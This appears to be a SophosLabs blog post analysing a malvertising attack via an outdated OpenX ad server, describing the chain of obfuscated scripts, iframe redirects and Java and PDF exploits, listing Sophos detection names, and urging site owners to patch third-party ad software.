Regular SophosLabs blog readers may have read previous posts about attacks that have poisoned ads content in order to inject malicious code into legitimate web sites. This is a nasty form of attack which can reach a potentially huge audience.
Yesterday I noticed another attack using poisoned ads content from an OpenX ads server.
The malicious script injected into the HTML served up from the compromised ads server is highlighted below.
Deobfuscating the script, we can see it adds an iframe to the page to load another malicious script.
This second script is obfuscated in the exact same manner.
It provides another iframe-driven redirect, in order to load a third obfuscated script. This final script is responsible for loading malicious Java and PDF content in order to exploit client-side vulnerabilities and infect the victim with the payload (pro-actively detected as Mal/TDSSPack-Z). Consistent with the recent rise we have reported in Java exploits, this attack involves malicious class files, targeting the HsbParser.getSoundBank vulnerability (CVE-2009-3867) and an old privilege escalation vulnerability in the handling of ZoneInfo objects during deserialization (CVE-2008-5353).
Sophos customers are already protected from this attack:
- The poisoned ads content and all the subsequent scripts loaded are pro-actively detected as Mal/ObfJS-CR
- The malicious Java content is pro-actively detected as Troj/BytVrfy-C and Troj/Clsldr-U
- Detection for the malicious PDF has been added as Troj/PDFJs-LE
- The payload is pro-actively detected as Mal/TDSSPack-Z
The most important message to learn from this attack concerns the use of third party software/applications in building web content. We have before about content management systems (CMS) providing easy targets for hackers looking to compromise sites. Third party advertising scripts are no different, providing a large population of target sites for the attacker.
There are various models for using OpenX advertising. One of them is OpenX Community Download, where the users host their own ad-server. Very convenient and quick to set up, but an often overlooked cost to this option is that the site administrator has to take on the responsibility of keeping their scripts updated. They need to keep up to date with vulnerabilities, security patches, new product versions etc. This is no small task, but failure to do so can result in what we have here - delivering malicious code to all the web sites loading the ad content. That is why hosted advertising models are also popular - leaving the hosting, updating and patching to the application vendor.
The ad-server hit in the attack described above is running v2.8.0, which is several versions out of date (the latest version is v2.8.5).